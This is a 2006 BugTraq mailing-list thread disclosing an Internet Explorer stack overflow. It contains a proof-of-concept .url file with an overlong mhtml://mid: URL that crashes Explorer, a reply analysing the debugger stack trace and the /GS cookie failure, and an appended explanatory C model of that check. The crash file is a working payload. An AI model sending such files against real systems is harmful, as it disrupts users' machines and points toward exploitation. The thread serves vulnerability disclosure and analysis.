BugTraq
Internet explorer Vulnerbility May 31 2006 08:12PM
Mr Niega gmail com (3 replies)
RE: Internet explorer Vulnerbility Jun 01 2006 08:37PM
Peter Kruse (kruse krusesecurity dk)
Re: Internet explorer Vulnerbility Jun 01 2006 09:45AM
Alexander Sotirov (asotirov determina com)
Re: Internet explorer Vulnerbility Jun 01 2006 07:01AM
Hariharan (harij22 gmail com)
I see this work in explorer and my ie 7 beta, both of them crash. But
this does not seem to be easily exploitable. It is a simple stack buffer
overrun issue. The problem seems to be in
inetcomm!CActiveUrlRequest::ParseUrl..... now inetcomm seems to have been
gs flag compiled, hence the overwrite of the security cookie causes the
internal handler inetcomm!__report_gsfailure to be called on function
return. This could be exploitable if some evasive techniques are used. But
on the face of it, it does not seem like an easy nut to crack.

All applications which use inetcomm are vulnerable if they are using url
parsing, especially mhtml:cid or mid; I haven't tried others yet, maybe
possible.

Thanks
-Hariharan

PS: This is what the stack looks like, notice the 'a' in it, seems
internally the function converts the url case.

00df9318 7c802542 00000758 000493e0 00000000 ntdll!KiFastSystemCallRet
00df932c 6945ada6 00000758 000493e0 003a0043 kernel32!WaitForSingleObject+0x12
00df9e10 6945aff1 00000734 00000b90 00000748 faultrep!InternalGenerateMinidumpEx+0x335
00df9e3c 6945b50a 00000734 00000b90 00dfa7e0 faultrep!InternalGenerateMinidump+0x75
00dfa718 69456652 00000734 00000b90 00dfa7e0 faultrep!InternalGenFullAndTriageMinidumps+0x8a
00dfbfd8 69457d3d 00dfc040 0154f660 00000000 faultrep!ReportFaultDWM+0x4e5
00dfc4c0 694582d8 00dfdad8 00dfd308 00000001 faultrep!StartManifestReportImmediate+0x268
00dfd52c 7c863059 00dfdad8 00000001 00dfd800 faultrep!ReportFault+0x55a
00dfd7a0 761e234e 00dfdad8 00000000 c0000409 kernel32!UnhandledExceptionFilter+0x4cf
00dfdae0 761769f2 00000000 00000000 00000000 inetcomm!__report_gsfailure+0xe3
00dfe444 61616161 61616161 61616161 61616161 inetcomm!CActiveUrlRequest::ParseUrl+0x67e
00dfe468 61616161 61616161 61616161 61616161 0x61616161
00dfe46c 61616161 61616161 61616161 61616161 0x61616161
00dfe470 61616161 61616161 61616161 61616161 0x61616161
00dfe474 61616161 61616161 61616161 61616161 0x61616161
00dfe478 61616161 61616161 61616161 61616161 0x61616161
00dfe47c 61616161 61616161 61616161 61616161 0x61616161
00dfe480 61616161 61616161 61616161 61616161 0x61616161
00dfe484 61616161 61616161 61616161 61616161 0x61616161
00dfe488 61616161 61616161 61616161 61616161 0x61616161

----- Original Message -----
From: <Mr.Niega (at) gmail (dot) com [email concealed]>
To: <bugtraq (at) securityfocus (dot) com [email concealed]>
Sent: Thursday, June 01, 2006 1:42 AM
Subject: Internet explorer Vulnerbility

> ------------------------------Niega.url-------------------------------
>
> [DEFAULT]
>
> BASEURL=
>
> [InternetShortcut]
>
> URL=mhtml://mid:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
>
> /*
> *
> * Internet Explorer overflow Vulnerability [Proof of concept]
> * Bug discovered by Mr.Niega
> * http://www.swerat.com/
> *
> * Affected Software: Microsoft Internet Explorer 6.x
> * Severity: Unknown
> * Impact: Crash
> * Solution Status: Unpatched
> *
> * E-Mail: Mr.Niega (at) gmail (dot) com [email concealed]
> * Credit goes out to MarjinZ and Andvare
> *
> * Note: By right clicking on the file, explorer will crash
> * Note: del=crash, F2=crash. Use cmd to delete the file
> */
>
> ------------------------------Niega.url-------------------------------
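To make the /GS behaviour Hariharan describes concrete, here is an added C model (not code from either poster or from inetcomm) of a cookie-protected frame: an unchecked lower-casing copy of an overlong mhtml://mid: URL lands on the cookie as 0x61616161, exactly the value seen in the trace, the epilogue check then flags it, and a length-checked parse never reaches the cookie. The frame layout, cookie constant and sample URL are assumptions constructed for the model.

```c
#include <ctype.h>
#include <stdint.h>
#include <string.h>
/* Constructed model of a /GS-protected frame: URL buffer, then the security
 * cookie, then the saved return address, in stack order. */
#define URL_BUF   64
#define GS_COOKIE 0xBB40E64Eu   /* assumed constant; real cookies are per-process */

typedef struct {
    char     url[URL_BUF];
    uint32_t cookie;
    uint32_t saved_ret;
} frame_t;

/* Constructed sample: the mhtml://mid: prefix followed by 100 'A's. */
static const char SAMPLE_URL[] = "mhtml://mid:"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

/* Models the defective ParseUrl: lower-cases the URL into the frame with no
 * length check, so bytes past url[] land on cookie and saved_ret (the 'a's in
 * the trace). The copy is clamped to the struct so the model itself stays
 * within defined behaviour. Returns the cookie value left in the frame. */
static uint32_t cookie_after_unchecked_copy(const char *src)
{
    frame_t f;
    unsigned char *p = (unsigned char *)&f;
    size_t n = strlen(src);
    memset(&f, 0, sizeof f);
    f.cookie = GS_COOKIE;
    if (n > sizeof f) n = sizeof f;
    for (size_t i = 0; i < n; i++) p[i] = (unsigned char)tolower((unsigned char)src[i]);
    return f.cookie;
}

/* Models the epilogue check that calls __report_gsfailure: 1 = cookie intact,
 * 0 = clobbered, after which the process is terminated with c0000409. */
static int gs_check(uint32_t cookie) { return cookie == GS_COOKIE; }

/* Hardened parse: reject anything that does not fit, so the cookie is never
 * reached. Returns the lower-cased URL, or NULL when the input is rejected. */
static const char *checked_parse(const char *src)
{
    static char out[URL_BUF];
    size_t n = strlen(src);
    if (n >= URL_BUF) return NULL;
    for (size_t i = 0; i < n; i++) out[i] = (char)tolower((unsigned char)src[i]);
    out[n] = '\0';
    return out;
}
```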
